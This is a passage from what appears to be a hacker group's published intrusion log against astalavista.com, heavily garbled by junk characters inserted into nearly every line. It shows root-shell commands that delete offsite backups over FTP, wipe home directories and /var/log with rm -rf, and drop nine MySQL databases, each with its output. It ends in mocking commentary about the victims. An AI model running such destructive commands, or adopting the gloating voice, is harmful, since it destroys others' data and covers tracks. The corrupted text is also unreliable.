1 f. v1 h. E( v7 t- f6 G$ O5 v; j250 CWD command successful.8 a* ~2 p: M* n8 `0 e* C: U
ftp> ls -la0 j: ~# a% \8 w+ @5 e; V% T
227 Entering Passive Mode (212,254,194,163,2,189)
, A. P9 x; S' a% l0 d8 D150 Opening BINARY mode data connection for ‘file list’.
. K& l6 ^ k9 |' O, W3 K. L-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar8 l' y. X& O( M
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz28 d% ]" z+ ?% O) [ `$ q$ a
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2+ Y8 f. Y0 h7 e% q
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
5 ]7 N5 i) Y/ `8 s( f5 W Y-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar& Q B" h# q2 i
[snip]1 v6 K% D$ B" d9 ^2 z
226 Transfer complete.7 q$ i$ i# L, _* M& N& Z- v9 k0 f
ftp> mdelete *
% s6 h: ^# _5 P, J2 K; nftp> ls -la L9 j) j( X' p0 P* v+ f
227 Entering Passive Mode (212,254,194,163,2,193). g/ y8 @' c. b; e3 Z2 B% ]5 S5 z) ~) p
150 Opening BINARY mode data connection for ‘file list’.
$ O. p* ?; W1 K i226 Transfer complete.5 C! k; w. {2 r9 ?- `7 j% J, T% j
ftp>
" p$ Y: k$ R) Q& a s2 Y1 G: \5 ^) Z+ L3 D/ N9 N
sh-3.2# cd /home
: R6 O6 O. A. F( k! o* `$ C+ Y0 r8 `sh-3.2# ls -la4 J6 ^& U( W# @# y( a
total 120
) I9 y$ r+ I v/ Ldrwxr-xr-x 14 root root 4096 Mar 11 17:56 . L, {6 S, E0 F4 b/ |8 \4 X! b' m
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..$ L" Y- ?" z4 o* V
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin8 w% O; d( s, ?
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group6 e9 i7 H* X) f5 M1 Q' ]" u
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user9 _- C. r1 n( ~) A
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
J; r( C; o: J: q% E7 Rdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
& k/ W. z/ W5 o, ?drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141611 e! D3 C+ o& ]0 [- Y8 j/ }
drwx–x–x 10 com com 4096 Apr 28 12:40 com/ ^) u" I1 Q- w+ f7 u6 g5 v
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
2 V2 a9 T. u; V8 B' ^drwx—— 3 jon jon 4096 Sep 21 2007 jon
/ b! n( {$ W: g o" e6 jdrwx—— 2 root root 16384 Sep 11 2007 lost+found
, b9 B7 c {5 \( L a2 \; Qdrwxr-xr-x 2 root root 4096 Sep 14 2007 my
3 r) D5 ]0 w) x' z4 {/ J2 d6 C. wdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
& Y* }3 M' y! f( T* ?1 t3 {drwx—— 2 jon jon 4096 Sep 15 2007 test, j8 z' c3 t3 r# ^# ]! n
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
9 R- K- n6 ?/ y, ]% Y( ^( J; G2 T. d" y: L0 I O
sh-3.2# rm -rf backup/
3 A) k* r$ @* ssh-3.2# rm -rf backup.14161/
& _: {0 i( x. Xsh-3.2# rm -rf ftp/# l# C7 P4 F& ^1 H* y; W
sh-3.2# rm -rf jon/$ ^$ l$ e& p: `; A: H
sh-3.2# rm -rf my/; ^+ p$ V4 y! e! c: E* _. `3 E, m w
sh-3.2# rm -rf mysqldata/. f; B: e/ ]8 ^- c! G7 Z9 q
sh-3.2# rm -rf test/
, C' f4 h& U+ a0 q% t0 msh-3.2# rm -rf tmp/
- @! L' ?- j/ r& }; D4 h, s* ish-3.2# cd ~: M3 H1 ^( ^* V3 H) C
sh-3.2# rm -rf *2 j+ S) A$ e8 ]/ W! i( s; ~
sh-3.2# rm -rf /var/log/
$ S# r" n. W! [rm: cannot remove directory `/var/log//proftpd’: Directory not empty, t5 U2 w. p, q( L- w, \
sh-3.2# rm -rf /home/*
, w1 I5 @! c* f; x3 y' Nsh-3.2# mysql- L$ \$ Q* }. M: U
Welcome to the MySQL monitor. Commands end with ; or \g.
+ s$ i! e2 l8 W$ OYour MySQL connection id is 407156
2 v+ T, j& N+ U1 r' ]Server version: 5.0.45-community-log MySQL Community Edition (GPL): y# y! Y+ P* d! h' U% C6 v5 g
R4 Z9 a+ ?. ^" O/ fType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
1 f! A/ B U# H( P) \
- C/ h' Y) }1 R1 mmysql> show databases;4 j4 b9 k* s+ }: v
+———————–+& D; z, y+ ^% T; r
| Database |
# f" ?' W1 j4 e" ` e+———————–+$ L6 f- _5 T; S" O0 u* U
| information_schema |
1 m! O' x9 s0 s; V# j+ @) y5 X| astanet_ads |
- @; X- d& x$ j: `| astanet_mailing_lists |
! C) u( X2 K' {/ {| astanet_mediawiki |( _/ D: y; t% a2 S- T
| astanet_membersystem |; f/ Y# E. I7 i
| com_contrexx |6 l+ n# {6 _, Q$ F3 w: h8 u
| com_contrexx2 |
- {$ ]/ Y- @+ H: P. O% ] D7 \| com_contrexx2_live |
! M5 m& ~/ k6 ?& Z0 P| da_roundcube |0 x7 ~1 d( a$ E0 g7 h; x- w
| dolphin |
- }8 {, ?; N; ~| ideapool |) S% V. z2 g3 a! I* J3 ^
| mysql |5 d! c x9 Z. r2 P1 T3 V
| test |
& {, `* h# N2 }3 ]0 k/ `1 j| yourmaster |
2 z c# s0 O: S4 B+———————–+. W; d% Q+ H0 c+ q6 V2 p4 a; d2 P
14 rows in set (0.03 sec)
O- g- o* t7 O: q# s
. J H1 q9 ^% Y# X/ y( \5 }mysql> drop database astanet_membersystem;
; ?$ C* P: ]# j) o) m( M4 v! M8 E5 zdroQuery OK, 46 rows affected (0.81 sec)& s3 i$ w% W, ]- h
; @" H* }+ A. C1 J( Zmysql> drop database com_contrexx;) X- N B7 ?4 q0 N! v
Query OK, 211 rows affected (2.72 sec)7 B9 X9 e% p) V ^! x5 J' L O: r
1 a+ Z( y' I( T' @$ Gmysql> drop database com_contrexx2;
! q+ E6 a0 M+ b2 _Query OK, 237 rows affected (2.23 sec)
% A! @6 @0 }+ A/ C4 ?2 M
7 H$ H) y( f" @3 smysql> drop database com_contrexx2_live;
! F# ]4 O" b! C. W2 }6 D% Z. `: ?, ]$ SQuery OK, 227 rows affected (7.63 sec)
$ a" Y+ K/ c4 ~/ j% N$ N2 \# X* B* N2 t! Q0 i
mysql> drop database ideapool;, E9 ]; {/ [7 L( L+ w. J
Query OK, 69 rows affected (0.19 sec)+ c3 I% [) B+ a* r* S7 `
. I$ V$ H" T8 l8 z" `9 x& a
mysql> drop database yourmaster;* D6 z( }" p5 E7 o/ |. Y% {
Query OK, 158 rows affected (0.55 sec)$ v1 x' [1 G3 r: P: I
; A; h! g7 o2 o% Emysql> drop database astanet_ads;& ?) N5 s Q h5 w' K
Query OK, 9 rows affected (0.11 sec): |4 `7 M% ]0 H: z C! j, O) e
A; p- a' f6 Fmysql> drop database astanet_mailing_lists;
* J7 B, s/ G+ o% PQuery OK, 24 rows affected (1.47 sec)8 U [; w* k/ w! r7 b9 V
& f3 i o* l2 P* f0 F; I+ G( y+ H
mysql> drop database astanet_mediawiki;
: G# z; A. S( m$ `Query OK, 31 rows affected (0.51 sec)
! A1 h4 b4 D: R$ R9 H6 @# l r. o; {* k4 K
mysql> show databases;
3 g+ m' u# e, ?4 ?& X/ I+——————–+3 B& e1 }- j; b7 o. I1 P
| Database |
! u) |. i1 U$ E; o) h! U X4 g# O+——————–+* a ?* l: O! p1 l/ @; q- t
| information_schema |
4 b5 b# Y& }6 G( I| da_roundcube |
8 U$ d/ M' f* |3 G; \9 Z+ G| dolphin |% ]7 r" l# Q; C3 g: b
| mysql |
& R& K9 W1 z/ `+ ~8 V| test |
& {8 s2 n3 D; |& P% `/ E5 x1 \- }+——————–+% L2 ~9 x# t" X
5 rows in set (0.00 sec)- z9 `2 U% b# Z
* s, h3 _! s+ F
What a journey! We’re not sure exactly why the “Terminator” had any influence on' b6 K# G0 F3 [& C2 x
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the, e7 J% W: v4 S8 ]/ ^0 D3 _
wrong to say this pack of morons *wont be back*.3 G2 d+ I/ \- j& Q" m6 b& ]
|